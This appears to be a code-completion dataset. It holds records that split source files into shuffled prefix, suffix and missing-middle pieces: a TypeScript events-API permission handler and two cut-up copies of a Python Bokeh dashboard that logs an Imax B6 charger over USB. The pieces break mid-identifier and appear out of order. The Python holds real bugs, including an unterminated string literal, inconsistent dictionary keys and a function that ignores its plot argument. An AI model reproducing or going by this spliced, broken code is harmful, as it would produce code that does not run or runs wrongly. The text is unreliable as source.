function tra | ntext: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
params.arrayOfStreamQueries = streamsQueryUtils.transformArrayOfStringsToStreamsQuery(params.streams);
} catch (e) {
return next(errors.invalidRequestStructure(e, params.streams));
}
next();
}
function validateStreamsQueriesAndSetStore(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
try {
streamsQueryUtils.validateStreamsQueriesAndSetStore(params.arrayOfStreamQueries);
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueries;
} catch (e) {
return next(errors.invalidRequestStructure('Initial filtering: ' + e, params.streams));
}
next();
}
// the two tasks are joined as '*' replaced have their permissions checked
async function streamQueryCheckPermissionsAndReplaceStars(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
context.tracing.startSpan('streamQueries');
const unAuthorizedStreamIds: Array<string> = [];
const unAccessibleStreamIds: Array<string> = [];
async function streamExistsAndCanGetEventsOnStream(streamId: string, storeId: string,
unAuthorizedStreamIds: Array<string>, unAccessibleStreamIds: Array<string>): Promise<void> {
// remove eventual '#' in streamQuery
const cleanStreamId: string = streamId.startsWith('#') ? streamId.substr(1) : streamId;
const stream: Stream = await context.streamForStreamId(cleanStreamId, storeId);
if (stream == null) {
unAccessibleStreamIds.push(cleanStreamId);
return;
}
if (! await context.access.canGetEventsOnStream(cleanStreamId, storeId)) {
unAuthorizedStreamIds.push(cleanStreamId);
}
}
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ "*" case
if (streamQuery.any && streamQuery.any.includes('*')) {
if (await context.access.canGetEventsOnStream('*', streamQuery.storeId)) continue; // We can keep star
// replace any by allowed streams for reading
const canReadStreamIds: Array<string> = [];
for (const streamPermission of context.access.getStoresPermissions(streamQuery.storeId)) {
if (await context.access.canGetEventsOnStream(streamPermission.streamId, streamQuery.storeId)) {
canReadStreamIds.push(streamPermission.streamId);
}
}
streamQuery.any = canReadStreamIds;
} else { // ------------ All other cases
/**
* ! we don't have to check for permissions on 'all' or 'not' as long there is at least one 'any' authorized.
*/
if (streamQuery?.any?.length === 0) {
return next(errors.invalidRequestStructure('streamQueries must have a valid {any: [...]} component'));
}
for (const streamId: string of streamQuery.any) {
await streamExistsAndCanGetEventsOnStream(streamId, streamQuery.storeId, unAuthorizedStreamIds, unAccessibleStreamIds);
};
}
}
if (unAuthorizedStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.forbidden('stream [' + unAuthorizedStreamIds[0] + '] has not sufficent permission to get events'));
}
if (unAccessibleStreamIds.length > 0) {
context.tracing.finishSpan('streamQueries');
return next(errors.unknownReferencedResource(
'stream' + (unAccessibleStreamIds.length > 1 ? 's' : ''),
'streams',
unAccessibleStreamIds));
}
next();
}
/**
* Add "forced" and "none" events from permissions
*/
function streamQueryAddForcedAndForbiddenStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
// ------------ ALL --------------- //
// add forced Streams if exists
const forcedStreamIds: Array<string> = context.access.getForcedStreamsGetEventsStreamIds(streamQuery.storeId);
if (forcedStreamIds?.length > 0) {
if (streamQuery.all == null) streamQuery.all = [];
// TODO check for duplicates
streamQuery.all.push(...forcedStreamIds);
}
// ------------- NOT ------------- //
const forbiddenStreamIds: Array<string> = context.access.getForbiddenGetEventsStreamIds(streamQuery.storeId);
if (forbiddenStreamIds?.length > 0) {
if (streamQuery.not == null) streamQuery.not = [];
// TODO check for duplicates
streamQuery.not.push(...forbiddenStreamIds);
}
}
next();
}
async function streamQueryExpandStreams(context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
async function expandStreamInContext(streamId: string, storeId: string, excludedIds) {
// remove eventual '#' in streamQuery
if (streamId.startsWith('#')) {
return [streamId.substr(1)]; // do not expand Stream
}
const query: StoreQuery = {
id: streamId,
storeId: storeId,
includeTrashed: params.state === 'all' || params.state === 'trashed',
expandChildren: true,
excludedIds: excludedIds
};
const tree: Array<Stream> = await mall.streams.get(context.user.id, query);
// collect streamIds
const resultWithPrefix: Array<string> = treeUtils.collectPluck(tree, 'id');
// remove storePrefix
const result: Array<string> = resultWithPrefix.map((fullStreamId: string) => StreamsUtils.storeIdAndStreamIdForStreamId(fullStreamId)[1]);
return result;
}
try {
params.arrayOfStreamQueriesWithStoreId = await streamsQueryUtils.expandAndTransformStreamQueries(params.arrayOfStreamQueriesWithStoreId, expandStreamInContext);
} catch (e) {
console.log(e);
context.tracing.finishSpan('streamQueries');
return next(e);
}
// delete streamQueries with no inclusions
params.arrayOfStreamQueriesWithStoreId = params.arrayOfStreamQueriesWithStoreId.filter(streamQuery => streamQuery.any != null || streamQuery.and != null);
context.tracing.finishSpan('streamQueries');
next();
}
/**
* - Create a copy of the params per query
* - Add specific stream queries to each of them
*/
async function findEventsFromStore(filesReadTokenSecret: string,
isStreamIdPrefixBackwardCompatibilityActive: boolean, isTagsBackwardCompatibilityActive: boolean,
context: MethodContext, params: GetEventsParams, result: Result, next: ApiCallback) {
if (params.arrayOfStreamQueriesWithStoreId?.length === 0) {
result.events = [];
return next();
}
// in> params.fromTime = 2 params.streams = [{any: '*' storeId: 'local'}, {any: 'access-gasgsg', storeId: 'audit'}, {any: 'action-events.get', storeId: 'audit'}]
const paramsByStoreId: Map<string, GetEventsParams> = {};
for (const streamQuery: StreamQueryWithStoreId of params.arrayOfStreamQueriesWithStoreId) {
const storeId: string = streamQuery.storeId;
if (storeId == null) {
console.error('Missing storeId' + params.arrayOfStreamQueriesWithStoreId);
throw(new Error("Missing storeId" + params.arrayOfStreamQueriesWithStoreId));
}
if (paramsByStoreId[storeId] == null) {
paramsByStoreId[storeId] = _.cloneDeep(params); // copy the parameters
paramsByStoreId[storeId].streams = []; // empty the stream query
}
delete streamQuery.storeId;
paramsByStoreId[storeId].streams.push(streamQuery);
}
// out> paramsByStoreId = { local: {fromTime: 2, streams: [{any: '*}]}, audit: {fromTime: 2, streams: [{any: 'access-gagsg'}, {any: 'action-events.get}]}
/**
* Will be called by "mall" for each source of event that need to be streames to result
* @param {Store} store
* @param {ReadableStream} eventsStream of "Events"
*/
function addnewEventStreamFromSource (store, eventsStream: ReadableStream) {
let stream: ReadableStream = eventsStream;
if (isStreamIdPrefixBackwardCompatibilityActive && !context.disableBackwardCompatibility) {
stream = eventsStream.pipe(new ChangeStreamIdPrefixStream());
}
if (isTagsBackwardCompatibilityActive) {
stream = stream.pipe(new addTagsStream());
}
stream = stream.pipe(new SetSingleStreamIdStream());
if (store.settings?.attachments?.setFileReadToken) {
stream = stream.pipe(new SetFileReadTokenStream({ access: context.access, filesReadTokenSecret }));
}
result.addToConcatArrayStream('events', stream);
}
await mall.events.generateStreams(context.user.id, paramsByStoreId, addnewEventStreamFromSource);
result.closeConcatArrayStream('events');
return next();
}
async function init() {
mall = await getMall();
}
module.exports = {
init,
applyDefaultsForRetrieval,
coerceStreamsParam,
validateStreamsQueriesAndSetStore,
transformArrayOfStringsToStreamsQuery,
streamQueryCheckPermissionsAndReplaceStars,
streamQueryAddForcedAndForbiddenStreams,
streamQueryExpandStreams,
findEventsFromStore,
} | nsformArrayOfStringsToStreamsQuery(co | identifier_name |
imax_logger.py | """
Bokah interface for Imax B6 mini charnger
Requires: bokeh - pip install bokuh
but calls imax_0.py; see imax_0.py for additional necessary library packages
"""
import sys
import time
import datetime
from bokeh.models import ColumnDataSource, Slider, DataTable, TableColumn
from bokeh.plotting import Figure, output_file, show
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_file, show
from bokeh.layouts import widgetbox, column, row
from bokeh.models.widgets import Button, RadioButtonGroup, Select, Slider, RadioGroup, Div, TextInput
from bokeh.layouts import gridplot, layout
from bokeh.plotting import curdoc
from bokeh.driving import linear
from bokeh.models.callbacks import CustomJS
#specify varibles for the inputs.
bat_type = ""
chrg_type = ""
nominal_mah = 0
DC_or_CD = "Discharge/Charge"
cycles = 1
cells = 4
run_text = "Enter run information"
time_interval = 10 #seconds
final_read = {'final_mah':"", 'final_t':"", 'final_V':"", 'final_T':""}
#next is set in start_device(), which is obtained from imax_0.start_imax
device_dict = {'device':None, 'EndPt_out':None, 'EndPt_in':None}
text_update = None
settings_dict = {}
read_data = {}
data_out_packet = []
device_started = False
out_data = {}
start_cycle = None
run_status = 0
#create a dictionary of initial values to minimize global calls
settings = {
'bat_type':bat_type,
'cells':cells,
'chrg_type':chrg_type,
'nominal_mah':nominal_mah,
'DC_or_CD':DC_or_CD,
'cycles':cycles,
'device_started':device_started,
'time_interval':time_interval,
'start_cycle':start_cycle,
'run_text':run_text,
'run_status':run_status,
'final_out':final_read,
'data_out_packet':data_out_packet,
'settings_dict':settings_dict,
'device_dict':device_dict
}
#Create the header for page
notice1 = Div(text="""The data input here are for logging identification and saving conditions, which are already manually chosen
on the imax. They do not set or reset the imax.""",
sizing_mode = "scale_width")
select_battype = Select(title = "Battery Type", value ="", options = ['NiMH', 'NiCd', 'LiPO', 'LiFe', 'LiIO', 'LiHV'])
def select_battype_handler(attr, old, new):
settings['bat_type'] = new
select_battype.on_change('value', select_battype_handler)
select_chrg_type = Select(title="Charge Type", value="Charge", options=["Charge", "Discharge", "Cycle", "Re-Peak", "AutoCharge", "Balance Charge", "Fast Charge", "Storage"])
def select_chrg_type_handler(attr, old, new):
settings['chrg_type'] = new
select_chrg_type.on_change('value', select_chrg_type_handler)
maxmah_slider = Slider(start=50, end=24000, value=1, step=50, title="Bat. Specified Capacity, mah")
def maxmah_handler(attr, old, new):
settings['nominal_mah'] = new
maxmah_slider.on_change('value', maxmah_handler)
DC_radio_group = RadioGroup(labels=["Discharge/Charge", "Charge/Discharge"], active=0)
def DC_radio_handler(new):
settings['DC'] = new
DC_radio_group.on_click(DC_radio_handler)
select_cells = Select(title = "No. of Cells", value ="4", options = [str(i) for i in range(1,13)])
def select_cells_handler(attr, old, new):
settings['cells'] = new
select_cells.on_change('value', select_cells_handler)
#imax discharge/charge # of cycles; imax limit is 5
#no way to read this from imax only shows up in set up packet
select_cycles = Select(title = "Cycles", value ="1", options = [str(i) for i in range(1,6)])
def select_cycles_handler(attr, old, new):
settings['cycles'] = new
select_cycles.on_change('value', select_cycles_handler)
text_input = TextInput(value="Enter run information", title="Run Info::")
def text_input_handler(attr, old, new):
settings['run_text'] = new
text_input.on_change("value", text_input_handler)
textsource = ColumnDataSource(data=dict(time = [],msg = []))
columns = [
TableColumn(field="time", title="Time"),
TableColumn(field="msg", title="Msg", width = 600)]
data_table = DataTable(source=textsource, columns=columns, width=600)
button_save = Button(label="Save Run", button_type = 'warning')
def button_save_handler():
global read_data
print('button save worked')
run_modes= {'bat_type':settings['bat_type'], 'chrg_type':settings['chrg_type'], 'nominal_mah':settings['nominal_mah'],
'DC_or_CD':settings['DC_or_CD'], 'cycles':settings['cycles'], 'cells':settings['cells'], 'run_text':settings['run_text']}
excel_out = imax_0.write_excel_file(run_modes, settings['final_read'], read_data, settings['settings_dict'])
msg = 'Data saved to: ' + excel_out
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_save.on_click(button_save_handler)
def | (t, msg):
global data_table
print('time and msg: ', t, msg)
new_data = dict(time=[t], msg=[msg],)
textsource.stream(new_data, 20) #adding the value is a scrolloff lines
data_table.update()
import imax_0
def check_device_status():
global device_dict
#used by startstop btn handler to determine if imax start btn was pressed, or imax running.
#global device_dict
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
device = device_dict['device']
#send host->imax packet to trigger imax to do imax->host transfer
#make sure device is still connected
if device:
w_out = device.write(EndPt_out, settings['data_out_packet'])
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
settings['run_status'] = int(str(data[4]))
return settings['run_status']
else:
print('Check device failed.')
return None
def get_final_data():
global device_dict
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
final_out = [0x0f, 0x03, 0xfe, 0x000, 0xfe, 0xff, 0xff] + [0]*57
w_out = device.write(EndPt_out, final_out)
final_data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
if final_data:
final_mah = str(final_data[5] * 256 + final_data[6]) #energy
final_t = str(final_data[7] * 256 + final_data[8]) #timer sec
final_V = str((final_data[9] * 256 + final_data[10]) / 1000.0) #voltage, V
final_T = str(final_data[14]) #Temperature, deg C, if F???
#int temp
settings['final_read'] = {'final_mah':final_mah, 'final_t':final_t, 'final_V':final_V, 'final_T':final_T}
msg = 'Run completed. Final values: ' + final_mah + ' mah; '+ final_V + ' mV; ' + final_t + ' s.'
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
def start_device():
global read_data
global device_dict
#sets up device if connected, returns imax settings, configrs, and sets data dictionary.
#check for device, if not there wait for connection.
device_str = imax_0.find_my_device() #returns True if device found
if "No" in device_str:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
print(device_str)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax offline. Cycling for one minute.')
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
while "No" in device_str:
device_str = imax_0.find_my_device() #returns msg which has "No" in it ,if device not found
if "No" in device_str:
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Could not find device; check device and connection.')
return False
time.sleep(1)
print('device found')
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
#device was found, engage device, get parameters and dictionaries
device_dict, read_data, settings_dict, data_out_packet = imax_0.start_imax()
print('Loading settings)
settings['settings_dict'] = settings_dict
settings['data_out_packet'] = data_out_packet
#Determine if device is idling, or already running: run_status = 2 or 3, or is running = 1
settings['run_status'] = check_device_status()
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Waiting for Imax button press for one minute.')
while settings['run_status'] > 1:
settings['run_status'] = check_device_status()
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax button not pressed in 1 min...aborting start.')
return False
time.sleep(1)
print('out of loop run_status is: ', settings['run_status'])
return True
def add_lines(plot, source, cells_num = 0):
#called from button_startstop_handler if bat_type LiPO, note cells must be > 1
color_list = ['orange', 'yellow', 'green', 'blue', 'violet', 'darkmagenta']
if cells_num > 1:
for i in range(cells_num):
p1.line(x = 'timer', y = 'cell'+ str(i+1), source = source, color = color_list[i], line_width = 2)
button_startstop = Button(label = "Start", button_type = 'success')
def button_startstop_handler():
global button_startstop
#read btn label and isas driver for condition
#label = "Start": and device_started = False is initial start up condition
if button_startstop.label == "Start":
button_startstop.label = "Connecting"
settings['device_started'] = start_device()
#returns True if device found,connected and started
if settings['device_started']:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax found & running.')
button_startstop.label = "Stop"
settings['start_cycle'] = curdoc().add_periodic_callback(update, 10000)
print('device found')
else:
if not settings['device_started']:
button_startstop.label = "Start"
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax start failed. Check everything')
else: #deal with stop conditions; user pressed app stop button, or run_status > 1 (imax buttons pressed.)
if button_startstop.label == "Stop":
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Run stopped.')
curdoc().remove_periodic_callback(settings['start_cycle'])
get_final_data()
button_startstop.label = "Start"
if "Li" in settings['bat_type']:
add_lines(p1, source, cells_num = int(settings['cells']))
button_startstop.on_click(button_startstop_handler)
def read_imax():
global read_data
global device_dict
# see above call to start_imax() for globals set from imax.py
#global data_out_packet
global out_data
#global run_status
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
#send the host->imax packet to trigger imax to fill buffer and do imax->host transfer
#make sure device is still connected
w_out = device.write(EndPt_out, settings['data_out_packet'])
try:
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize) #using more general form of Endpoint_IN attributes
except Exception as e:
print('Something went wrong: no data incoming; error is: ', e)
sys.exit()
#Parse the hex data
out_data['mah'] = [int(str(data[5]*256 + data[6]))] #capacity, mah
out_data['timer'] = [int(str(data[7]*256 + data[8]))] #seconds
out_data['volts'] = [int(str(data[9]*256 + data[10]))] #volts
out_data['current'] = [int(str(data[11]*256 + data[12]))] #amps
out_data['ext_T'] = [int(str(data[13]))]
out_data['internal_T'] = [int(str(data[14]))] #deg. C?
out_data['cell1'] = [int(str(data[17]*256 + data[18]))] #cell 1 etc.
out_data['cell2'] = [int(str(data[19]*256 + data[20]))]
out_data['cell3'] = [int(str(data[21]*256 + data[22]))]
out_data['cell4'] = [int(str(data[23]*256 + data[24]))]
out_data['cell5'] = [int(str(data[25]*256 + data[26]))]
out_data['cell6'] = [int(str(data[27]*256 + data[28]))]
read_data['mah'].append(int(str(data[5]*256 + data[6]))) #capacity, mah
read_data['timer'].append(int(str(data[7]*256 + data[8]))) #seconds
read_data['volts'].append(int(str(data[9]*256 + data[10]))) #volts
read_data['current'].append(int(str(data[11]*256 + data[12]))) #amps
read_data['ext_T'].append(int(str(data[13])))
read_data['internal_T'].append(int(str(data[14]))) #deg. C?
read_data['cell1'].append(int(str(data[17]*256 + data[18])))
read_data['cell2'].append(int(str(data[19]*256 + data[20])))
read_data['cell3'].append(int(str(data[21]*256 + data[22])))
read_data['cell4'].append(int(str(data[23]*256 + data[24])))
read_data['cell5'].append(int(str(data[25]*256 + data[26])))
read_data['cell6'].append(int(str(data[27]*256 + data[28])))
#print the data (same sequence Milek7 used with hidapi; much appreciated effort.
print(
str(data[4]) + ", " + #state
str(data[5] * 256 + data[6]) + ", " + #energy
str(data[7] * 256 + data[8]) + ", " + #timer
str((data[9] * 256 + data[10]) / 1000.0) + ", " + #voltage
str((data[11] * 256 + data[12]) / 1000.0) + ", " + #current
str(data[13]) + ", " + #ext temp
str(data[14]) + ", " + #int temp
str((data[17] * 256 + data[18]) / 1000.0) + ", " + #cell 1
str((data[19] * 256 + data[20]) / 1000.0) + ", " + #cels 2
str((data[21] * 256 + data[22]) / 1000.0) + ", " + #cell 3
str((data[23] * 256 + data[24]) / 1000.0) + ", " + #cell 4
str((data[25] * 256 + data[26]) / 1000.0) + ", " + #cell 5
str((data[27] * 256 + data[28]) / 1000.0) #cell 6
)
#Has the charger been stopped by pressing the charger Stop button?
settings['run_status'] = int(str(data[4]))
return settings['run_status'], out_data
#initialize read_data dictionary for plots
out_data = {'mah':[0], 'timer':[0], 'volts':[0], 'current':[0],
'ext_T':[0], 'internal_T':[0], 'cell1':[0], 'cell2':[0],
'cell3':[0],'cell4':[0], 'cell5':[0], 'cell6':[0]}
#time_interval = 5 #seconds
source = ColumnDataSource(data = out_data)
#Generate two plots, for capacity and voltage
p = figure(plot_width=400, plot_height=400)
p.title.text = "Capactiy Input vs. Charge Time"
p.title.text_color = "black"
p.title.text_font = "arial"
p.title.text_font_style = "bold"
p.yaxis.minor_tick_line_color = "black"
p.xaxis.axis_label = "Time, s"
p.yaxis.axis_label = "Capacity Added(mah)"
r_cap = p.line(x = 'timer', y = 'mah', source = source, color="red", line_width=2)
#Set the voltabe plot; complicated a bit by battery type
p1 = figure(plot_width=400, plot_height=400)
p1.title.text = "Voltage vs. Charge Time"
p1.title.text_color = "black"
p1.title.text_font = "arial"
p1.title.text_font_style = "bold"
p1.yaxis.minor_tick_line_color = "black"
p1.xaxis.axis_label = "Time, s"
p1.yaxis.axis_label = "Voltage. mV"
rx = p1.line(x = 'timer', y = 'volts', source = source, color = "firebrick", line_width=2)
"""
#test block for adding lines
if "Li" in bat_type:
r1 = p1.line(x ='timer', y = 'cell1', source = source, color="orange", line_width=2)
r2 = p1.line(x ='timer', y = 'cell2', source = source, color="yellow", line_width=2)
r3 = p1.line(x ='timer', y = 'cell3', source = source, color="green", line_width=2)
r4 = p1.line(x ='timer', y = 'cell4', source = source, color="blue", line_width=2)
r5 = p1.line(x ='timer', y = 'cell5', source = source, color="violet", line_width=2)
r6 = p1.line(x ='timer', y = 'cell6', source = source, color="darkmagenta", line_width=2)
"""
def update():
global out_data
global source
global device_dict
device = device_dict['device']
if device:
#note "new_data" is bokeh specific to only add to source
settings['run_status'], new_data = read_imax()
#print('read_imax returned run status: ', settings['run_status'])
if settings['run_status'] < 2 and button_startstop.label == "Stop":
source.stream(new_data) # 20)
else:
msg = '; User stopped run from imax stop button.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
else:
msg = '; Device no longer connected.'
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_startstop_handler()
"""
class Cycler(update()):
msg = "Message from Cycler"
start_cycle = staticmethod(curdoc().add_periodic_callback(update, 10000))
stop_cycle = staticmethod(curdoc().remove_periodic_callback(start_cycle))
# create the widgets
"""
#start_cycle = curdoc().add_periodic_callback(update, 10000) #time in milliseconds
#w1 = row(select_battype, select_chrg_type) #, width = 300) #sizing_mode = 'fixed')
w1 = widgetbox(select_battype, select_chrg_type, select_cells) #, width = 300) #sizing_mode = 'fixed')
w2 = widgetbox(maxmah_slider) #, sizing_mode='fixed')
w3 = widgetbox(text_input) #, sizing_mode = 'fixed')
w4 = widgetbox(button_startstop, button_save )#, sizing_mode ='fixed')
w5 = widgetbox(DC_radio_group, select_cycles)
w6 = widgetbox(data_table)
"""
Layit = layout([row(column(
[notice1],
[w1],
[w2],
[w3],
[w4],
[w5],
[data_table]),
column(p, p1))], sizing_mode='fixed')
"""
#Layit = gridplot([[column([p, p1]), widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children)]])
curdoc().add_root(notice1)
Layit = gridplot([[widgetbox(w1.children+w2.children+w3.children+w4.children+w5.children,), column([p, p1])]])
curdoc().add_root(Layit)
curdoc().add_root(data_table)
#curdoc().add_root(p)
#curdoc().add_root(p1)
#interval is not constant,
#based on derivative of capacity
# Add a periodic callback to be run every 500 milliseconds
#curdoc().add_periodic_callback(update, 500)
#for running textarea update following is one way to do it with js
"""
textare udating w/ jquery and textarea
var txt = document.getElementById('log');
setInterval(function(){txt.value += '\ntest';},2000);
<textarea id='log' rows=50 cols=60 autofocus></textarea>
""" | text_update | identifier_name |
imax_logger.py | """
Bokah interface for Imax B6 mini charnger
Requires: bokeh - pip install bokuh
but calls imax_0.py; see imax_0.py for additional necessary library packages
"""
import sys
import time
import datetime
from bokeh.models import ColumnDataSource, Slider, DataTable, TableColumn
from bokeh.plotting import Figure, output_file, show
from bokeh.plotting import figure, output_file, show
from bokeh.io import output_file, show
from bokeh.layouts import widgetbox, column, row
from bokeh.models.widgets import Button, RadioButtonGroup, Select, Slider, RadioGroup, Div, TextInput
from bokeh.layouts import gridplot, layout
from bokeh.plotting import curdoc
from bokeh.driving import linear
from bokeh.models.callbacks import CustomJS
#specify varibles for the inputs.
bat_type = ""
chrg_type = ""
nominal_mah = 0
DC_or_CD = "Discharge/Charge"
cycles = 1
cells = 4
run_text = "Enter run information"
time_interval = 10 #seconds
final_read = {'final_mah':"", 'final_t':"", 'final_V':"", 'final_T':""}
#next is set in start_device(), which is obtained from imax_0.start_imax
device_dict = {'device':None, 'EndPt_out':None, 'EndPt_in':None}
text_update = None
settings_dict = {}
read_data = {}
data_out_packet = []
device_started = False
out_data = {}
start_cycle = None
run_status = 0
#create a dictionary of initial values to minimize global calls
settings = {
'bat_type':bat_type,
'cells':cells,
'chrg_type':chrg_type,
'nominal_mah':nominal_mah,
'DC_or_CD':DC_or_CD,
'cycles':cycles,
'device_started':device_started,
'time_interval':time_interval,
'start_cycle':start_cycle,
'run_text':run_text,
'run_status':run_status,
'final_out':final_read,
'data_out_packet':data_out_packet,
'settings_dict':settings_dict,
'device_dict':device_dict
}
#Create the header for page
notice1 = Div(text="""The data input here are for logging identification and saving conditions, which are already manually chosen
on the imax. They do not set or reset the imax.""",
sizing_mode = "scale_width")
select_battype = Select(title = "Battery Type", value ="", options = ['NiMH', 'NiCd', 'LiPO', 'LiFe', 'LiIO', 'LiHV'])
def select_battype_handler(attr, old, new):
settings['bat_type'] = new
select_battype.on_change('value', select_battype_handler)
select_chrg_type = Select(title="Charge Type", value="Charge", options=["Charge", "Discharge", "Cycle", "Re-Peak", "AutoCharge", "Balance Charge", "Fast Charge", "Storage"])
def select_chrg_type_handler(attr, old, new):
settings['chrg_type'] = new
select_chrg_type.on_change('value', select_chrg_type_handler)
maxmah_slider = Slider(start=50, end=24000, value=1, step=50, title="Bat. Specified Capacity, mah")
def maxmah_handler(attr, old, new):
settings['nominal_mah'] = new
maxmah_slider.on_change('value', maxmah_handler)
DC_radio_group = RadioGroup(labels=["Discharge/Charge", "Charge/Discharge"], active=0)
def DC_radio_handler(new):
settings['DC'] = new
DC_radio_group.on_click(DC_radio_handler)
select_cells = Select(title = "No. of Cells", value ="4", options = [str(i) for i in range(1,13)])
def select_cells_handler(attr, old, new):
settings['cells'] = new
select_cells.on_change('value', select_cells_handler)
#imax discharge/charge # of cycles; imax limit is 5
#no way to read this from imax only shows up in set up packet
select_cycles = Select(title = "Cycles", value ="1", options = [str(i) for i in range(1,6)])
def select_cycles_handler(attr, old, new):
settings['cycles'] = new
select_cycles.on_change('value', select_cycles_handler)
text_input = TextInput(value="Enter run information", title="Run Info::")
def text_input_handler(attr, old, new):
settings['run_text'] = new
text_input.on_change("value", text_input_handler)
textsource = ColumnDataSource(data=dict(time = [],msg = []))
columns = [
TableColumn(field="time", title="Time"),
TableColumn(field="msg", title="Msg", width = 600)]
data_table = DataTable(source=textsource, columns=columns, width=600)
button_save = Button(label="Save Run", button_type = 'warning')
def button_save_handler():
global read_data
print('button save worked')
run_modes= {'bat_type':settings['bat_type'], 'chrg_type':settings['chrg_type'], 'nominal_mah':settings['nominal_mah'],
'DC_or_CD':settings['DC_or_CD'], 'cycles':settings['cycles'], 'cells':settings['cells'], 'run_text':settings['run_text']}
excel_out = imax_0.write_excel_file(run_modes, settings['final_read'], read_data, settings['settings_dict'])
msg = 'Data saved to: ' + excel_out
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
button_save.on_click(button_save_handler)
def text_update(t, msg):
global data_table
print('time and msg: ', t, msg)
new_data = dict(time=[t], msg=[msg],)
textsource.stream(new_data, 20) #adding the value is a scrolloff lines
data_table.update()
import imax_0
def check_device_status():
global device_dict
#used by startstop btn handler to determine if imax start btn was pressed, or imax running.
#global device_dict
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
device = device_dict['device']
#send host->imax packet to trigger imax to do imax->host transfer
#make sure device is still connected
if device:
w_out = device.write(EndPt_out, settings['data_out_packet'])
data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
settings['run_status'] = int(str(data[4]))
return settings['run_status']
else:
print('Check device failed.')
return None
def get_final_data():
global device_dict
device = device_dict['device']
EndPt_out = device_dict['EndPt_out']
EndPt_in = device_dict['EndPt_in']
final_out = [0x0f, 0x03, 0xfe, 0x000, 0xfe, 0xff, 0xff] + [0]*57
w_out = device.write(EndPt_out, final_out)
final_data = device.read(EndPt_in.bEndpointAddress,EndPt_in.wMaxPacketSize)
if final_data:
final_mah = str(final_data[5] * 256 + final_data[6]) #energy
final_t = str(final_data[7] * 256 + final_data[8]) #timer sec
final_V = str((final_data[9] * 256 + final_data[10]) / 1000.0) #voltage, V
final_T = str(final_data[14]) #Temperature, deg C, if F???
#int temp
settings['final_read'] = {'final_mah':final_mah, 'final_t':final_t, 'final_V':final_V, 'final_T':final_T}
msg = 'Run completed. Final values: ' + final_mah + ' mah; '+ final_V + ' mV; ' + final_t + ' s.'
print(msg)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), msg)
def start_device():
global read_data
global device_dict
#sets up device if connected, returns imax settings, configrs, and sets data dictionary.
#check for device, if not there wait for connection.
device_str = imax_0.find_my_device() #returns True if device found
if "No" in device_str:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
print(device_str)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax offline. Cycling for one minute.')
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
while "No" in device_str:
|
print('device found')
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), device_str)
#device was found, engage device, get parameters and dictionaries
device_dict, read_data, settings_dict, data_out_packet = imax_0.start_imax()
print('Loading settings)
settings['settings_dict'] = settings_dict
settings['data_out_packet'] = data_out_packet
#Determine if device is idling, or already running: run_status = 2 or 3, or is running = 1
settings['run_status'] = check_device_status()
nowtime = datetime.datetime.now()
futuretime = datetime.datetime.now() + datetime.timedelta(minutes = 1)
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Waiting for Imax button press for one minute.')
while settings['run_status'] > 1:
settings['run_status'] = check_device_status()
if datetime.datetime.now()> futuretime:
text_update(datetime.datetime.now().strftime("%Y-%m-%d %H:%M"), 'Imax button not pressed in 1 min...aborting start.')
return False
time.sleep(1)
print('out of loop run_status is: ', settings['run_status'])
return True
def add_lines(plot, source, cells_num = 0):
#called from button_startstop_handler if bat_type LiPO, note cells must be > 1
color_list = ['orange', 'yellow', 'green', 'blue', 'violet', 'darkmagenta']
if cells_num > 1:
for i in range(cells_num):
p1.line(x = 'timer', y = 'cell'+ str(i+1), source = source, color = color_list[i], line_width = 2)
button_startstop = Button(label = "Start", button_type = 'success')
def button_startstop_handler():
global button_startstop
#read btn label and isas driver for condition
